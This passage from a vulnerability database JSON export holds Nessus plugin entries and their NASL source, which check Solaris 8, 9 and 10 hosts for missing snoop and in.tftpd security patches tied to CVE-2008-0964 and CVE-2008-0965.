"modified": "2008-08-12T00:00:00", "id": "SECURITYVULNS:VULN:9214", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9214", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:52:11", "references": ["http://download.oracle.com/sunalerts/1019497.1.html"], "pluginID": "33911", "description": "SunOS 5.10: snoop patch.\nDate this patch was last updated by Sun : Aug/04/08", "edition": 5, "reporter": "Tenable", "published": "2008-08-17T00:00:00", "title": "Solaris 10 (sparc) : 138083-01", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0964", "CVE-2008-0965"], "modified": "2018-08-13T00:00:00", "cpe": [], "id": "SOLARIS10_138083.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33911", "sourceData": "\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/10/24.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(33911);\n script_version(\"1.18\");\n\n script_name(english: \"Solaris 10 (sparc) : 138083-01\");\n script_xref(name:\"IAVT\", value:\"2008-T-0043\");\n script_cve_id(\"CVE-2008-0964\", \"CVE-2008-0965\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 138083-01\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.10: snoop patch.\nDate this patch was last updated by Sun : Aug/04/08');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"http://download.oracle.com/sunalerts/1019497.1.html\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(134);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/08/17\");\n script_cvs_date(\"Date: 2018/08/13 14:32:38\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 138083-01\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-13T16:48:26", "references": ["https://download.oracle.com/sunalerts/1019497.1.html"], "pluginID": "107502", "description": "SunOS 5.10: snoop patch.\nDate this patch was last updated by Sun : Aug/04/08", "edition": 5, "reporter": "Tenable", "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 138083-01", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0964", "CVE-2008-0965"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:138083", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_138083-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=107502", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107502);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/10 11:49:58\");\n\n script_cve_id(\"CVE-2008-0964\", \"CVE-2008-0965\");\n script_xref(name:\"IAVT\", value:\"2008-T-0043\");\n\n script_name(english:\"Solaris 10 (sparc) : 138083-01\");\n script_summary(english:\"Check for patch 138083-01\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 138083-01\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.10: snoop patch.\nDate this patch was last updated by Sun : Aug/04/08\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://download.oracle.com/sunalerts/1019497.1.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 138083-01\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 134);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:138083\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"138083-01\", obsoleted_by:\"138104-01 141414-07 141444-09 \", package:\"SUNWrcmdc\", version:\"11.10.0,REV=2005.01.21.15.53\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWrcmdc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:47:10", "references": ["https://getupdates.oracle.com/readme/114262-05"], "pluginID": "33921", "description": "SunOS 5.9_x86: snoop Patch.\nDate this patch was last updated by Sun : Jan/06/09", "edition": 6, "reporter": "Tenable", "published": "2008-08-17T00:00:00", "title": "Solaris 9 (x86) : 114262-05", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0964", "CVE-2008-0965"], "modified": "2016-12-12T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_X86_114262.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33921", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33921);\n script_version(\"$Revision: 1.18 $\");\n script_cvs_date(\"$Date: 2016/12/12 14:59:32 $\");\n\n script_cve_id(\"CVE-2008-0964\", \"CVE-2008-0965\");\n script_xref(name:\"IAVT\", value:\"2008-T-0043\");\n\n script_name(english:\"Solaris 9 (x86) : 114262-05\");\n script_summary(english:\"Check for patch 114262-05\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 114262-05\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.9_x86: snoop Patch.\nDate this patch was last updated by Sun : Jan/06/09\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/114262-05\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 134);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/17\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"114262-05\", obsoleted_by:\"\", package:\"SUNWrcmdc\", version:\"11.9.0,REV=2002.11.04.02.51\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:09:54", "references": ["http://download.oracle.com/sunalerts/1019497.1.html"], "pluginID": "33916", "description": "SunOS 5.8: in.tftpd and snoop patch.\nDate this patch was last updated by Sun : Aug/04/08", "edition": 6, "reporter": "Tenable", "published": "2008-08-17T00:00:00", "title": "Solaris 8 (sparc) : 108964-11", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0964", "CVE-2008-0965"], "modified": "2016-12-12T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS8_108964.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33916", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33916);\n script_version(\"$Revision: 1.20 $\");\n script_cvs_date(\"$Date: 2016/12/12 14:59:32 $\");\n\n script_cve_id(\"CVE-2008-0964\", \"CVE-2008-0965\");\n script_xref(name:\"IAVT\", value:\"2008-T-0043\");\n\n script_name(english:\"Solaris 8 (sparc) : 108964-11\");\n script_summary(english:\"Check for patch 108964-11\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 108964-11\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.8: in.tftpd and snoop patch.\nDate this patch was last updated by Sun : Aug/04/08\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://download.oracle.com/sunalerts/1019497.1.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 134);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/17\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108964-11\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108964-11\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"108964-11\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.8.0,REV=2000.01.08.18.12\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:09:28", "references": ["https://getupdates.oracle.com/readme/112915-06"], "pluginID": "33919", "description": "SunOS 5.9: snoop Patch.\nDate this patch was last updated by Sun : Jan/06/09", "edition": 6, "reporter": "Tenable", "published": "2008-08-17T00:00:00", "title": "Solaris 9 (sparc) : 112915-06", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0964", "CVE-2008-0965"], "modified": "2016-12-12T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_112915.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33919", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33919);\n script_version(\"$Revision: 1.16 $\");\n script_cvs_date(\"$Date: 2016/12/12 14:59:32 $\");\n\n script_cve_id(\"CVE-2008-0964\", \"CVE-2008-0965\");\n script_xref(name:\"IAVT\", value:\"2008-T-0043\");\n\n script_name(english:\"Solaris 9 (sparc) : 112915-06\");\n script_summary(english:\"Check for patch 112915-06\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 112915-06\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.9: snoop Patch.\nDate this patch was last updated by Sun : Jan/06/09\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/112915-06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 134);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/17\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"112915-06\", obsoleted_by:\"\", package:\"SUNWrcmdc\", version:\"11.9.0,REV=2002.04.06.15.27\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-13T16:47:37", "references": ["https://download.oracle.com/sunalerts/1019497.1.html"], "pluginID": "108000", "description": "SunOS 5.10_x86: snoop patch.\nDate this patch was last updated by Sun : Aug/04/08", "edition": 5, "reporter": "Tenable", "published": "2018-03-12T00:00:00", "title": "Solaris 10 (x86) : 138084-01", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0964", "CVE-2008-0965"], "modified": "2018-11-10T00:00:00", "cpe": ["cpe:/o:oracle:solaris:10", "p-cpe:/a:oracle:solaris:10:138084"], "id": "SOLARIS10_X86_138084-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=108000", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108000);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/10 11:49:58\");\n\n script_cve_id(\"CVE-2008-0964\", \"CVE-2008-0965\");\n script_xref(name:\"IAVT\", value:\"2008-T-0043\");\n\n script_name(english:\"Solaris 10 (x86) : 138084-01\");\n script_summary(english:\"Check for patch 138084-01\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 138084-01\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.10_x86: snoop patch.\nDate this patch was last updated by Sun : Aug/04/08\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://download.oracle.com/sunalerts/1019497.1.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 138084-01\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 134);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:138084\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"138084-01\", obsoleted_by:\"141415-09 141445-09 138105-01 141732-02 \", package:\"SUNWrcmdc\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWrcmdc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:43:57", "references": ["http://download.oracle.com/sunalerts/1019497.1.html"], "pluginID": "33915", "description": "SunOS 5.10_x86: snoop patch.\nDate this patch was last updated by Sun : Aug/04/08", "edition": 5, "reporter": "Tenable", "published": "2008-08-17T00:00:00", "title": "Solaris 10 (x86) : 138084-01", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0964", "CVE-2008-0965"], "modified": "2018-08-13T00:00:00", "cpe": [], "id": "SOLARIS10_X86_138084.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33915", "sourceData": "\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/10/24.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(33915);\n script_version(\"1.18\");\n\n script_name(english: \"Solaris 10 (x86) : 138084-01\");\n script_xref(name:\"IAVT\", value:\"2008-T-0043\");\n script_cve_id(\"CVE-2008-0964\", \"CVE-2008-0965\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 138084-01\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.10_x86: snoop patch.\nDate this patch was last updated by Sun : Aug/04/08');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"http://download.oracle.com/sunalerts/1019497.1.html\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(134);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/08/17\");\n script_cvs_date(\"Date: 2018/08/13 14:32:38\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 138084-01\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:38:21", "references": ["http://download.oracle.com/sunalerts/1019497.1.html"], "pluginID": "33918", "description": "SunOS 5.8_x86: in.tftpd and snoop patch.\nDate this patch was last updated by Sun : Aug/04/08", "edition": 6, "reporter": "Tenable", "published": "2008-08-17T00:00:00", "title": "Solaris 8 (x86) : 108965-11", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0964", "CVE-2008-0965"], "modified": "2016-12-12T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS8_X86_108965.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33918", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33918);\n script_version(\"$Revision: 1.18 $\");\n script_cvs_date(\"$Date: 2016/12/12 14:59:32 $\");\n\n script_cve_id(\"CVE-2008-0964\", \"CVE-2008-0965\");\n script_xref(name:\"IAVT\", value:\"2008-T-0043\");\n\n script_name(english:\"Solaris 8 (x86) : 108965-11\");\n script_summary(english:\"Check for patch 108965-11\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 108965-11\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.8_x86: in.tftpd and snoop patch.\nDate this patch was last updated by Sun : Aug/04/08\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://download.oracle.com/sunalerts/1019497.1.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 134);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/17\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108965-11\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108965-11\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\nif (solaris_check_patch(release:\"5.8_x86\", arch:\"i386\", patch:\"108965-11\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.8.0,REV=2000.01.08.18.17\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T21:32:54", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "BUGTRAQ ID: 30556\r\nCVE ID\uff1aCVE-2008-0964\r\n CVE-2008-0965\r\nCNCVE ID\uff1aCNCVE-20080964\r\n CNCVE-20080965\r\n\r\nSun 